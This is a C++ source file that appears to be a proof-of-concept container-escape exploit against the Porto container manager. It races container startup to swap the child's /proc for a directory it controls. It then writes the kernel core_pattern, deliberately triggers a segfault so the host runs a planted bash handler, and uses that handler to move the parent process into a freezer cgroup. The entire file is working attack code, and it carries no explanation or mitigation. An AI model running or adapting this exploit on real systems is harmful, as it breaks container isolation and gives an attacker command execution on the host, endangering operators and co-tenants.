#include <stdlib.h>
#include <unistd.h>
#include <sys/inotify.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <iostream>
#include <string>
#include <vector>
#include <fstream>
#include <istream>
#include <signal.h>
#include <util/string/builder.h>
#include <contrib/libs/porto_api/libporto.hpp>

#define EVENT_SIZE (sizeof(struct inotify_event))
#define BUF_LEN (1024 * (EVENT_SIZE + 16))

void block_until(const TString& target, ui32 mask) {
    int fd = inotify_init();
    if (fd < 0) {
        perror("inotify_init failed: ");
        return;
    }

    int wd = inotify_add_watch(fd, target.c_str(), mask);
    char buffer[BUF_LEN];
    ssize_t length = read(fd, buffer, BUF_LEN - 1);

    if (length < 0) {
        perror("inotify_read failed: ");
    }

    inotify_rm_watch(fd, wd);
    close(fd);
}

TString random_string(const int len) {
    static const char alphanum[] =
        "0123456789"
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "abcdefghijklmnopqrstuvwxyz";

    srand(time(NULL));
    TString res;
    for (int i = 0; i < len; ++i) {
        res += alphanum[rand() % (sizeof(alphanum) - 1)];
    }
    return res;
}

bool copy_file(const TString& src, const TString& dst) {
    std::ifstream s(src, std::fstream::binary);
    std::ofstream d(dst, std::fstream::trunc | std::fstream::binary);
    d << s.rdbuf();
    d.close();
    s.close();
    return d && chmod(~dst, 0777);
}

int write_bash_file(const TString& path, const TString& content) {
    std::ofstream cp(path, std::fstream::trunc);
    cp << "#!/bin/bash\n"
       << content;
    cp.close();
    return cp && chmod(~path, 0777);
}

int main(int argc, char** argv) {
    if (argc == 3 && !strcmp(argv[1], "setup-core")) {
        std::ofstream cp("/sproc/sys/kernel/core_pattern");
        cp << "|/usr/sbin/portoctl exec " << argv[2] << " command=/core stdout_path=/dev/null stderr_path=/dev/null isolate=false";
        cp.close();
        kill(getpid(), SIGSEGV);
        return EXIT_SUCCESS;
    }

    TString target_dir = "/tmp" + random_string(5);
    TString stolen_proc = target_dir + "/sproc";
    TStringBuilder core_handler_code;
    core_handler_code << "mount -t cgroup -ofreezer freezer /freezer\n"
        << "echo " << getppid() << " > /freezer/cgroup.procs";

    Cout << "creating root at " << target_dir << Endl;
    Cout << "mkdir " << target_dir << ": " << mkdir(~target_dir, 0777) << Endl;
    Cout << "mkdir " << stolen_proc << ": " << mkdir(~stolen_proc, 0777) << Endl;
    Cout << "mkdir " << target_dir << "/run: " << mkdir(~(target_dir + "/run"), 0777) << Endl;
    Cout << "mkdir /freezer: " << mkdir("/freezer", 0777) << Endl;
    Cout << "link /sproc -> /proc: " << symlink(~stolen_proc, ~(target_dir + "/proc")) << Endl;
    Cout << "copy /self -> /steal: " << copy_file("/proc/self/exe", ~(target_dir + "/steal")) << Endl;
    Cout << "creating core handler: " << write_bash_file("/core", core_handler_code) << Endl;

    int pid = fork();
    if (pid > 0) {
        Cout << "start child" << Endl;
        Porto::Connection api;
        TString absolute_name;
        api.GetProperty("self", "absolute_name", absolute_name);
        TString name = absolute_name + target_dir;
        api.Create(name);
        api.SetProperty(name, "root", target_dir);
        api.SetProperty(name, "command", "/steal setup-core " + name + "-c");
        api.SetProperty(name, "isolate", "false");
        api.SetProperty(name, "resolv_conf", "keep");
        api.SetProperty(name, "virt_mode", "os");

        if (api.Start(name)) {
            int error;
            TString msg;
            api.GetLastError(error, msg);
            Cerr << "failed to start child container: " << msg << Endl;
        }

        TVector<TString> containers = {name};
        TString result;
        if (api.WaitContainers(containers, result, TDuration({.tv_sec = 5, .tv_usec = 0}))) {
            int error;
            TString msg;
            api.GetLastError(error, msg);
            Cerr << "failed to wait child container: " << msg << Endl;
        }

        api.Destroy(name);
        exit(0);
    } else {
        Cout << "waiting for mounting /run" << Endl;
        block_until(target_dir + "/run", IN_OPEN);

        Cout << "recreate /proc" << Endl;
        Cout << "unlink /proc: " << unlink(~(target_dir + "/proc")) << Endl;
        Cout << "mkdir /proc: " << mkdir(~(target_dir + "/proc"), 0777) << Endl;
        Cout << "symlink /sproc/self -> /proc/self: "
                  << symlink(~(stolen_proc + "/self"), ~(target_dir + "/proc/self")) << Endl;

        TVector<TString> mandatory_procs = {
            "/proc/sysrq-trigger",
            "/proc/irq",
            "/proc/bus",
            "/proc/sys",
            "/proc/kcore",
        };

        for (auto& path : mandatory_procs) {
            std::ofstream tmp(target_dir + path);
            tmp.close();
            Cout << "touch " << path << ": " << !tmp << Endl;
        }
    }

    waitpid(pid, nullptr, 0);
    return EXIT_SUCCESS;
}
